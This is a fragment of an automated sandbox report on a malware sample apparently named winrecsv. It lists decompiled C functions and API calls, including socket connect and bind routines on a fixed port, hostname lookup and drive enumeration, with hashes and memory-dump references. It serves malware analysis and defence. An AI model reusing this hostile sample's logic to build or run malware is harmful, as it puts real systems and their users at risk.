                                                                                  • Instruction Fuzzy Hash: 2C113075900108BFCB04DF98D841E9EBB75AF48304F14C1A9FD19AB342D635EA10CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040B9D3
                                                                                  • htons.WS2_32(00009E34), ref: 0040BA05
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 0040BA1F
                                                                                    • Part of subcall function 00409940: shutdown.WS2_32(0040992D,00000002), ref: 00409949
                                                                                    • Part of subcall function 00409940: closesocket.WS2_32(0040992D), ref: 00409953
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: closesocketconnecthtonsshutdownsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1987800339-0
                                                                                  • Opcode ID: e302ac02c00c680b9bd5bbb7eef578896a586a72e60fad90fd638c416b6389a6
                                                                                  • Instruction ID: 0afc104acbc2a1c2722e6414f741f2353ed594099cbcebe19ef64c9892d1b102
                                                                                  • Opcode Fuzzy Hash: e302ac02c00c680b9bd5bbb7eef578896a586a72e60fad90fd638c416b6389a6
                                                                                  • Instruction Fuzzy Hash: 63113CB4E14309EBCF10DFA4D9096AEB670EF04320F2042A9F525A73D0D7744F019B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E00408D00(void* __ecx) {
                                                                                  				char _v8;
                                                                                  				signed char _t5;
                                                                                  				long _t7;
                                                                                  				signed char _t9;
                                                                                  				signed char _t10;
                                                                                  
                                                                                  				if((E00408B90() & 0x000000ff) == 0) {
                                                                                  					L2:
                                                                                  					_t5 = HeapCreate(0, 0, 0); // executed
                                                                                  					 *0x414414 = _t5;
                                                                                  					if( *0x414414 != 0) {
                                                                                  						_v8 = 2;
                                                                                  						_t9 =  *0x414414; // 0x930000
                                                                                  						__imp__HeapSetInformation(_t9, 0,  &_v8, 4);
                                                                                  						_t7 = GetCurrentProcessId();
                                                                                  						 *0x414e48 = _t7;
                                                                                  						return _t7;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t10 =  *0x414414; // 0x930000
                                                                                  					_t5 = E00408C70(_t10);
                                                                                  					if((_t5 & 0x000000ff) == 0) {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t5;
                                                                                  			}








                                                                                  0x00408d0e
                                                                                  0x00408d26
                                                                                  0x00408d2c
                                                                                  0x00408d32
                                                                                  0x00408d3e
                                                                                  0x00408d40
                                                                                  0x00408d4f
                                                                                  0x00408d56
                                                                                  0x00408d5c
                                                                                  0x00408d62
                                                                                  0x00000000
                                                                                  0x00408d62
                                                                                  0x00408d10
                                                                                  0x00408d10
                                                                                  0x00408d17
                                                                                  0x00408d24
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00408d24
                                                                                  0x00408d6a

                                                                                  APIs
                                                                                    • Part of subcall function 00408B90: GetCurrentProcessId.KERNEL32(?,00408DAB,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408B93
                                                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408DB7,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408D2C
                                                                                  • HeapSetInformation.KERNEL32(00930000,00000000,00000002,00000004), ref: 00408D56
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408D5C
                                                                                    • Part of subcall function 00408C70: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00408C8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                  • String ID:
                                                                                  • API String ID: 3179415709-0
                                                                                  • Opcode ID: 8cf13a9f05b6669887cfc933ed30433b164df7621b61a2dd6ef65711bd196f76
                                                                                  • Instruction ID: 8bdf3cca161eb603aec6aeb6121799ecf35629f53a577dba7e6e256eef3a136c
                                                                                  • Opcode Fuzzy Hash: 8cf13a9f05b6669887cfc933ed30433b164df7621b61a2dd6ef65711bd196f76
                                                                                  • Instruction Fuzzy Hash: 13F0BBB0540318ABE324DB61FE05B663769A754705F00C13DF640A62D1DF79E504C76D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00408DA0(void* __ecx, void* __edx, intOrPtr _a4, long _a8) {
                                                                                  				int _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t23;
                                                                                  				void* _t30;
                                                                                  				void* _t33;
                                                                                  
                                                                                  				_t30 = __ecx;
                                                                                  				if((E00408B90() & 0x000000ff) == 0) {
                                                                                  					E00408D00(_t30); // executed
                                                                                  				}
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v12 = E00408B50(_a4 + 2, 4);
                                                                                  					_t33 =  *0x414414; // 0x930000
                                                                                  					_t23 = RtlAllocateHeap(_t33, _a8, _v12 + 0xc); // executed
                                                                                  					_v16 = _t23;
                                                                                  					if(_v16 != 0) {
                                                                                  						_v8 = E00408D70(_v16, _v12);
                                                                                  						if((_a8 & 0x00000008) == 0) {
                                                                                  							memset(_v8 + _a4, 0, _v12 - _a4);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}









                                                                                  0x00408da0
                                                                                  0x00408db0
                                                                                  0x00408db2
                                                                                  0x00408db2
                                                                                  0x00408db7
                                                                                  0x00408dc2
                                                                                  0x00408dd5
                                                                                  0x00408de3
                                                                                  0x00408dea
                                                                                  0x00408df0
                                                                                  0x00408df7
                                                                                  0x00408e09
                                                                                  0x00408e12
                                                                                  0x00408e24
                                                                                  0x00408e29
                                                                                  0x00408e12
                                                                                  0x00408df7
                                                                                  0x00408e32

                                                                                  APIs
                                                                                    • Part of subcall function 00408B90: GetCurrentProcessId.KERNEL32(?,00408DAB,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408B93
                                                                                  • RtlAllocateHeap.NTDLL(00930000,?,-0000000C), ref: 00408DEA
                                                                                  • memset.NTDLL ref: 00408E24
                                                                                    • Part of subcall function 00408D00: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408DB7,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408D2C
                                                                                    • Part of subcall function 00408D00: HeapSetInformation.KERNEL32(00930000,00000000,00000002,00000004), ref: 00408D56
                                                                                    • Part of subcall function 00408D00: GetCurrentProcessId.KERNEL32 ref: 00408D5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3494217179-0
                                                                                  • Opcode ID: badde77dfdf40572ef0a3e86c64e640400ab749034a28f8520fe5de1279b3f2f
                                                                                  • Instruction ID: c75194c1b737f1735b46638b4685076338f686d797c7d839f6f9c907a18bfdff
                                                                                  • Opcode Fuzzy Hash: badde77dfdf40572ef0a3e86c64e640400ab749034a28f8520fe5de1279b3f2f
                                                                                  • Instruction Fuzzy Hash: 551152B1D00108FBCB10EFA5D945B9E7BB4AF44304F10C16DF544AB381EA389E44CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 93%
                                                                                  			E0040C2C0(void* __ecx, void* __edi) {
                                                                                  				intOrPtr* _v8;
                                                                                  				LONG* _v12;
                                                                                  				short _v16;
                                                                                  				long _v20;
                                                                                  				void* __ebx;
                                                                                  				intOrPtr* _t13;
                                                                                  				LONG* _t14;
                                                                                  				void* _t23;
                                                                                  				intOrPtr _t27;
                                                                                  				void* _t29;
                                                                                  				void* _t30;
                                                                                  
                                                                                  				_t28 = __edi;
                                                                                  				_t23 = __ecx;
                                                                                  				_push(0);
                                                                                  				_t13 = E0040E110(__edi);
                                                                                  				_t30 = _t29 + 4;
                                                                                  				_v8 = _t13;
                                                                                  				if(_v8 != 0) {
                                                                                  					do {
                                                                                  						_t14 = E00409F60(_t23); // executed
                                                                                  						_v12 = _t14;
                                                                                  						if(_v12 != 0 && InterlockedExchangeAdd(_v12, 0) == 0) {
                                                                                  							_v20 = _v12[1];
                                                                                  							_v16 = 0x9e34;
                                                                                  							_t27 =  *0x414e6c; // 0xe9ca09cc
                                                                                  							E0040A390(_v8, 0, _t27, 0, 0, E0040C240,  &_v20); // executed
                                                                                  							_t30 = _t30 + 0x1c;
                                                                                  						}
                                                                                  						_t23 =  *0x414e64; // 0x52c
                                                                                  					} while (WaitForSingleObject(_t23, 0x1388) == 0x102);
                                                                                  					return E0040E0A0(_v8, _t28);
                                                                                  				}
                                                                                  				return _t13;
                                                                                  			}














                                                                                  0x0040c2c0
                                                                                  0x0040c2c0
                                                                                  0x0040c2c7
                                                                                  0x0040c2c9
                                                                                  0x0040c2ce
                                                                                  0x0040c2d1
                                                                                  0x0040c2d8
                                                                                  0x0040c2da
                                                                                  0x0040c2da
                                                                                  0x0040c2df
                                                                                  0x0040c2e6
                                                                                  0x0040c2fe
                                                                                  0x0040c306
                                                                                  0x0040c317
                                                                                  0x0040c324
                                                                                  0x0040c329
                                                                                  0x0040c329
                                                                                  0x0040c331
                                                                                  0x0040c33e
                                                                                  0x00000000
                                                                                  0x0040c348
                                                                                  0x0040c351

                                                                                  APIs
                                                                                    • Part of subcall function 0040E110: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                    • Part of subcall function 0040E110: socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                    • Part of subcall function 0040E110: bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 00409F60: EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
                                                                                    • Part of subcall function 00409F60: LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
                                                                                  • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040C2EE
                                                                                  • WaitForSingleObject.KERNEL32(0000052C,00001388), ref: 0040C338
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3920643007-0
                                                                                  • Opcode ID: 0b99e573d8f315015a3dd1e5e97ee7d2eab42a6bfeb1e7241c1c55ca9ad94b3f
                                                                                  • Instruction ID: 8bdc2a01645c520112e94222a2c7a5a1540a7fb89cef399606225106f8c8f3ff
                                                                                  • Opcode Fuzzy Hash: 0b99e573d8f315015a3dd1e5e97ee7d2eab42a6bfeb1e7241c1c55ca9ad94b3f
                                                                                  • Instruction Fuzzy Hash: 12018870E00308EBD700EBE5DC86B9E7774EB48704F508579E500BB2D2D679AE50C758
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E00409AB0(intOrPtr _a4) {
                                                                                  				char _v260;
                                                                                  				char _v261;
                                                                                  				int _v268;
                                                                                  				signed int _v272;
                                                                                  				int _t23;
                                                                                  
                                                                                  				_v261 = 0;
                                                                                  				_t23 = gethostname( &_v260, 0x100); // executed
                                                                                  				if(_t23 != 0xffffffff) {
                                                                                  					__imp__#52( &_v260); // executed
                                                                                  					_v268 = _t23;
                                                                                  					if(_v268 != 0) {
                                                                                  						_v272 = 0;
                                                                                  						while( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)) != 0) {
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)))) != _a4) {
                                                                                  								_v272 = _v272 + 1;
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v261 = 1;
                                                                                  							}
                                                                                  							goto L8;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L8:
                                                                                  				return _v261;
                                                                                  			}








                                                                                  0x00409ab9
                                                                                  0x00409acc
                                                                                  0x00409ad5
                                                                                  0x00409ade
                                                                                  0x00409ae4
                                                                                  0x00409af1
                                                                                  0x00409af3
                                                                                  0x00409b0e
                                                                                  0x00409b3a
                                                                                  0x00409b08
                                                                                  0x00000000
                                                                                  0x00409b3c
                                                                                  0x00409b3c
                                                                                  0x00409b3c
                                                                                  0x00000000
                                                                                  0x00409b3a
                                                                                  0x00409b0e
                                                                                  0x00409af1
                                                                                  0x00409b47
                                                                                  0x00409b50

                                                                                  APIs
                                                                                  • gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                  • gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: gethostbynamegethostname
                                                                                  • String ID:
                                                                                  • API String ID: 3961807697-0
                                                                                  • Opcode ID: 808cf5df3e9fd6a65e29826da0babf303ea90eaf0688b2a0cc418730ea916311
                                                                                  • Instruction ID: f0f33a221f668f8c0fcc91920a55244d325127aac38b05b4e471762a159245cf
                                                                                  • Opcode Fuzzy Hash: 808cf5df3e9fd6a65e29826da0babf303ea90eaf0688b2a0cc418730ea916311
                                                                                  • Instruction Fuzzy Hash: 52113C349081588BCB24CF14D888BE9B771BB65324F1482EAD98967381CBF9AEC1DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: gethostbynameinet_addr
                                                                                  • String ID:
                                                                                  • API String ID: 1594361348-0
                                                                                  • Opcode ID: ae6e9143cc9fd0412d08de2142f11acaaa5e5d8f8e0ab0b734499e2ded0367d9
                                                                                  • Instruction ID: e12a1822e7991c67d301e70435f839a18b0547e84016115f2855d72db6d5141d
                                                                                  • Opcode Fuzzy Hash: ae6e9143cc9fd0412d08de2142f11acaaa5e5d8f8e0ab0b734499e2ded0367d9
                                                                                  • Instruction Fuzzy Hash: 48F0AC79D01208EFCB14EFA5D54899DFBB4EB49311F20C2AAE905673A0D735DE80DB84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • shutdown.WS2_32(0040992D,00000002), ref: 00409949
                                                                                  • closesocket.WS2_32(0040992D), ref: 00409953
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: closesocketshutdown
                                                                                  • String ID:
                                                                                  • API String ID: 572888783-0
                                                                                  • Opcode ID: c790331b5cd7c8b9c3a3a0dd8161d67bf409c5c834cb86956d8decf4f63a3b2a
                                                                                  • Instruction ID: 861187f23b08c56acf9f6e17a30e7296ca2e2ef9db7bec87e2e63002d69b9e52
                                                                                  • Opcode Fuzzy Hash: c790331b5cd7c8b9c3a3a0dd8161d67bf409c5c834cb86956d8decf4f63a3b2a
                                                                                  • Instruction Fuzzy Hash: 41C04C79180308FBDF549FA5EC4DDD93B6CFB48751F008555FA098B251CAF6E9808B94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 87%
                                                                                  			E00409F60(void* __ecx) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _t7;
                                                                                  				signed int _t8;
                                                                                  
                                                                                  				_t9 = __ecx;
                                                                                  				_push(__ecx);
                                                                                  				_v8 = 0;
                                                                                  				EnterCriticalSection(0x414e4c);
                                                                                  				if( *0x414e84 != 0) {
                                                                                  					_t7 =  *0x414e84; // 0x200
                                                                                  					_t8 = E0040AB90(_t9, _t7); // executed
                                                                                  					_v8 =  *((intOrPtr*)(0x414e88 + _t8 * 4));
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x414e4c);
                                                                                  				return _v8;
                                                                                  			}






                                                                                  0x00409f60
                                                                                  0x00409f63
                                                                                  0x00409f64
                                                                                  0x00409f70
                                                                                  0x00409f7d
                                                                                  0x00409f7f
                                                                                  0x00409f85
                                                                                  0x00409f94
                                                                                  0x00409f94
                                                                                  0x00409f9c
                                                                                  0x00409fa8

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
                                                                                  • LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 01d01ecd818faf5180c661ddcbcbb2319f5acf6ff06af3063e4ed8a914aad338
                                                                                  • Instruction ID: 25df91cf97f831dea6273b9daeb39aeabfa88b51072c83d00e806302a444a612
                                                                                  • Opcode Fuzzy Hash: 01d01ecd818faf5180c661ddcbcbb2319f5acf6ff06af3063e4ed8a914aad338
                                                                                  • Instruction Fuzzy Hash: 5EE01AB5941308ABCB04DB94ED0AB9977B8F744315F148079F80493391E7B9AE50CA59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409A90() {
                                                                                  				void* _t1;
                                                                                  				void* _t2;
                                                                                  
                                                                                  				EnterCriticalSection(0x414e4c); // executed
                                                                                  				_t2 = E004099A0(_t1); // executed
                                                                                  				LeaveCriticalSection(0x414e4c);
                                                                                  				return _t2;
                                                                                  			}





                                                                                  0x00409a98
                                                                                  0x00409a9e
                                                                                  0x00409aa8
                                                                                  0x00409aaf

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00414E4C,?,0040A157), ref: 00409A98
                                                                                  • LeaveCriticalSection.KERNEL32(00414E4C,?,0040A157), ref: 00409AA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: e18a02edf5445c449eccb006dd19a446ab1a3f82073fd4b8f85ff8a6d52f202e
                                                                                  • Instruction ID: 3b0d21b6a5788eaa33e0a5e0c64b79d2b817c3cb29f227cef7228f4eaa42b4a3
                                                                                  • Opcode Fuzzy Hash: e18a02edf5445c449eccb006dd19a446ab1a3f82073fd4b8f85ff8a6d52f202e
                                                                                  • Instruction Fuzzy Hash: ACB09B3514030C77C10037E1EC0F5C47758E5457153554036F405D31538BFF14D1455E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040BC50(void* __ecx) {
                                                                                  				LONG* _v8;
                                                                                  				LONG* _t4;
                                                                                  				signed char _t5;
                                                                                  				void* _t10;
                                                                                  
                                                                                  				_t8 = __ecx;
                                                                                  				_push(__ecx); // executed
                                                                                  				while(1) {
                                                                                  					_t4 = E00409F60(_t8); // executed
                                                                                  					_v8 = _t4;
                                                                                  					if(_v8 != 0) {
                                                                                  						E0040BAB0(_v8, 0); // executed
                                                                                  						_t10 = _t10 + 8;
                                                                                  					}
                                                                                  					_t8 =  *0x414e64; // 0x52c
                                                                                  					_t5 = WaitForSingleObject(_t8, 0x1388);
                                                                                  					if(_t5 != 0x102) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t5 = E0040A190();
                                                                                  					if((_t5 & 0x000000ff) == 0) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				return _t5;
                                                                                  			}







                                                                                  0x0040bc50
                                                                                  0x0040bc53
                                                                                  0x0040bc54
                                                                                  0x0040bc54
                                                                                  0x0040bc59
                                                                                  0x0040bc60
                                                                                  0x0040bc68
                                                                                  0x0040bc6d
                                                                                  0x0040bc6d
                                                                                  0x0040bc75
                                                                                  0x0040bc7c
                                                                                  0x0040bc87
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040bc89
                                                                                  0x0040bc93
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040bc93
                                                                                  0x0040bc98

                                                                                  APIs
                                                                                    • Part of subcall function 00409F60: EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
                                                                                    • Part of subcall function 00409F60: LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
                                                                                  • WaitForSingleObject.KERNEL32(0000052C,00001388), ref: 0040BC7C
                                                                                    • Part of subcall function 0040BAB0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040BABC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 3309573332-0
                                                                                  • Opcode ID: 9f999fc85b079daa0ea8d94160f70d4837a7598394ec2e0625308a16e62c20a1
                                                                                  • Instruction ID: 45619751f27a18747ded538dc82d1d8d9d30f0da801dbdba264301761bfcf2d9
                                                                                  • Opcode Fuzzy Hash: 9f999fc85b079daa0ea8d94160f70d4837a7598394ec2e0625308a16e62c20a1
                                                                                  • Instruction Fuzzy Hash: 57E09270904308A6E714E7A19C0AB5F7269D754305F14847EF9007A2C2DE799E80C7DC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction ID: 32df2bfe7de06f0c235163c896e6267a06dc4b8e9f39d59c6c8874ca765da36c
                                                                                  • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction Fuzzy Hash: 0FE0127490020CFFDF00DF90C889BDEBBB9EB44315F1081A9E90467284D7B55A84CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404860(signed int _a4, signed int _a8, WCHAR* _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v12;
                                                                                  				short _v14;
                                                                                  				short _v16;
                                                                                  				intOrPtr _t19;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if((0x00000001 << _a8 & _a4) != 0) {
                                                                                  					_v16 = _a8 + 0x41;
                                                                                  					_v14 = 0x3a;
                                                                                  					_v12 = 0;
                                                                                  					_t19 = E004047E0( &_v16); // executed
                                                                                  					_v8 = _t19;
                                                                                  					if(_v8 != 0) {
                                                                                  						lstrcpyW(_a12,  &_v16);
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}








                                                                                  0x00404866
                                                                                  0x0040487a
                                                                                  0x00404883
                                                                                  0x0040488c
                                                                                  0x00404892
                                                                                  0x0040489a
                                                                                  0x004048a2
                                                                                  0x004048a9
                                                                                  0x004048b3
                                                                                  0x004048b3
                                                                                  0x004048a9
                                                                                  0x004048bf

                                                                                  APIs
                                                                                    • Part of subcall function 004047E0: GetDriveTypeW.KERNELBASE(0040489F), ref: 004047ED
                                                                                  • lstrcpyW.KERNEL32 ref: 004048B3
